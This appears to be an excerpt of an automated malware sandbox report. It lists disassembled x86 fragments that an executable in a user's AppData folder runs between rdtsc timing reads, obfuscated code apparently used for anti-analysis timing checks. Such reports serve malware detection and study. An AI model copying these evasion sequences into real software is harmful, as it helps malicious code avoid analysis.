Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5A7511 second address: 5A7520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F95FD07A056h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5AA22D second address: 5AA233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5AA233 second address: 5AA240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jc 00007F95FD07A05Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5AA240 second address: 5AA244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5AA244 second address: 5AA249 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5AA249 second address: 5AA288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95FD7D89A7h 0x00000009 jo 00007F95FD7D8996h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F95FD7D89A4h 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5AA288 second address: 5AA28E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5AA28E second address: 5AA293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5AF4F4 second address: 5AF505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F95FD07A056h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5AF505 second address: 5AF509 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5AE325 second address: 5AE32A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5AE4A5 second address: 5AE4C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F95FD7D89A8h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5882F8 second address: 588391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 jmp 00007F95FD07A068h 0x0000000b nop 0x0000000c mov di, 437Bh 0x00000010 push dword ptr fs:[00000000h] 0x00000017 cmc 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007F95FD07A058h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 0000001Bh 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 and bx, E8EDh 0x0000003e mov eax, dword ptr [ebp+122D0369h] 0x00000044 mov edi, dword ptr [ebp+1245E2A1h] 0x0000004a push FFFFFFFFh 0x0000004c js 00007F95FD07A05Ch 0x00000052 push ebx 0x00000053 xor ebx, 5ADA31B9h 0x00000059 pop edi 0x0000005a nop 0x0000005b jmp 00007F95FD07A066h 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 588391 second address: 588397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 588397 second address: 58839C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 58839C second address: 5883A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5883A2 second address: 5883A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 58951C second address: 589524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 589524 second address: 589528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 58B62E second address: 58B632 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 58B632 second address: 58B657 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jns 00007F95FD07A060h 0x00000013 push eax 0x00000014 push edx 0x00000015 je 00007F95FD07A056h 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 58B657 second address: 58B65B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 58EBA3 second address: 58EC02 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F95FD07A060h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov bh, E1h 0x00000015 mov dword ptr fs:[00000000h], esp 0x0000001c mov dword ptr [ebp+122D248Fh], eax 0x00000022 mov eax, dword ptr [ebp+122D07F9h] 0x00000028 mov bx, 6EEEh 0x0000002c push FFFFFFFFh 0x0000002e push 00000000h 0x00000030 push ebp 0x00000031 call 00007F95FD07A058h 0x00000036 pop ebp 0x00000037 mov dword ptr [esp+04h], ebp 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc ebp 0x00000044 push ebp 0x00000045 ret 0x00000046 pop ebp 0x00000047 ret 0x00000048 nop 0x00000049 jp 00007F95FD07A05Eh 0x0000004f push esi 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 58FD41 second address: 58FD46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 590AE3 second address: 590AE8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 590AE8 second address: 590B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ebx, dword ptr [ebp+12484F62h] 0x00000010 push dword ptr fs:[00000000h] 0x00000017 adc bh, 0000004Fh 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 push 00000000h 0x00000023 push ecx 0x00000024 call 00007F95FD7D8998h 0x00000029 pop ecx 0x0000002a mov dword ptr [esp+04h], ecx 0x0000002e add dword ptr [esp+04h], 00000017h 0x00000036 inc ecx 0x00000037 push ecx 0x00000038 ret 0x00000039 pop ecx 0x0000003a ret 0x0000003b mov eax, dword ptr [ebp+122D0795h] 0x00000041 jne 00007F95FD7D8999h 0x00000047 push FFFFFFFFh 0x00000049 nop 0x0000004a jmp 00007F95FD7D899Bh 0x0000004f push eax 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 590B4B second address: 590B4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 590B4F second address: 590B5D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F95FD7D899Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5AEFC1 second address: 5AEFCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5AEFCC second address: 5AEFD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57DC9E second address: 55E2ED instructions: 0x00000000 rdtsc 0x00000002 ja 00007F95FD07A056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F95FD07A058h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 jmp 00007F95FD07A05Bh 0x0000002b push edi 0x0000002c jbe 00007F95FD07A05Bh 0x00000032 mov edi, 1BC9F3D9h 0x00000037 pop edi 0x00000038 call dword ptr [ebp+122D29AFh] 0x0000003e pushad 0x0000003f push ebx 0x00000040 push esi 0x00000041 pop esi 0x00000042 pop ebx 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57DE37 second address: 57DE3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57E149 second address: 57E14D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57E14D second address: 57E153 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57E36E second address: 57E372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57E372 second address: 57E376 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57E376 second address: 57E39C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F95FD07A05Dh 0x0000000b popad 0x0000000c xchg eax, esi 0x0000000d movzx ecx, bx 0x00000010 nop 0x00000011 pushad 0x00000012 push esi 0x00000013 pushad 0x00000014 popad 0x00000015 pop esi 0x00000016 jc 00007F95FD07A05Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57E39C second address: 57E3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F95FD7D89A2h 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57E479 second address: 57E496 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 pushad 0x0000000a jl 00007F95FD07A056h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop esi 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57E496 second address: 57E49A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57E49A second address: 57E4CC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jo 00007F95FD07A056h 0x0000000f popad 0x00000010 popad 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 push ebx 0x00000015 je 00007F95FD07A056h 0x0000001b pop ebx 0x0000001c push ebx 0x0000001d push edi 0x0000001e pop edi 0x0000001f pop ebx 0x00000020 popad 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 pushad 0x00000026 ja 00007F95FD07A058h 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57E4CC second address: 57E4D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57E597 second address: 57E59C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57EADD second address: 57EAF5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F95FD7D899Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57EAF5 second address: 57EB06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jnp 00007F95FD07A060h 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57EB06 second address: 57EB65 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F95FD7D8998h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 00000018h 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 sub edi, dword ptr [ebp+12470923h] 0x00000027 mov ecx, dword ptr [ebp+122D3715h] 0x0000002d push 0000001Eh 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 call 00007F95FD7D8998h 0x00000037 pop eax 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c add dword ptr [esp+04h], 00000015h 0x00000044 inc eax 0x00000045 push eax 0x00000046 ret 0x00000047 pop eax 0x00000048 ret 0x00000049 nop 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d push eax 0x0000004e pop eax 0x0000004f jo 00007F95FD7D8996h 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57EB65 second address: 57EB6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57EB6B second address: 57EB6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57EC7D second address: 57EC83 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5B37ED second address: 5B37F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5B3B17 second address: 5B3B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5B3C6D second address: 5B3C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5B3C73 second address: 5B3C8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F95FD07A063h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5B3C8B second address: 5B3CD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F95FD7D8996h 0x0000000a jmp 00007F95FD7D89A3h 0x0000000f popad 0x00000010 jmp 00007F95FD7D89A0h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F95FD7D89A0h 0x0000001e jmp 00007F95FD7D899Bh 0x00000023 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5B3CD8 second address: 5B3CE2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F95FD07A05Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5B3FB1 second address: 5B3FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5B3FB7 second address: 5B3FBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5B3FBB second address: 5B3FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5B4265 second address: 5B427F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F95FD07A061h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5BC551 second address: 5BC557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5BC557 second address: 5BC55B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5BC55B second address: 5BC55F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5BCB36 second address: 5BCB3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C090A second address: 5C0941 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D899Dh 0x00000007 jmp 00007F95FD7D899Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F95FD7D89A7h 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C0367 second address: 5C036B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C0604 second address: 5C0613 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F95FD7D8996h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C2A7E second address: 5C2A8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 jl 00007F95FD07A056h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C2A8E second address: 5C2A92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C7733 second address: 5C7738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C6C1A second address: 5C6C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F95FD7D8996h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C6C26 second address: 5C6C2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C6C2F second address: 5C6C33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C6E92 second address: 5C6EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95FD07A066h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C713F second address: 5C7143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C7143 second address: 5C714B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C714B second address: 5C7155 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F95FD7D8996h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C7155 second address: 5C7159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C72C1 second address: 5C72CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C9EAF second address: 5C9EB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C9EB9 second address: 5C9EBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C9EBD second address: 5C9EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C9EC9 second address: 5C9ECD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5CA1DB second address: 5CA212 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F95FD07A066h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F95FD07A064h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57E902 second address: 57E906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
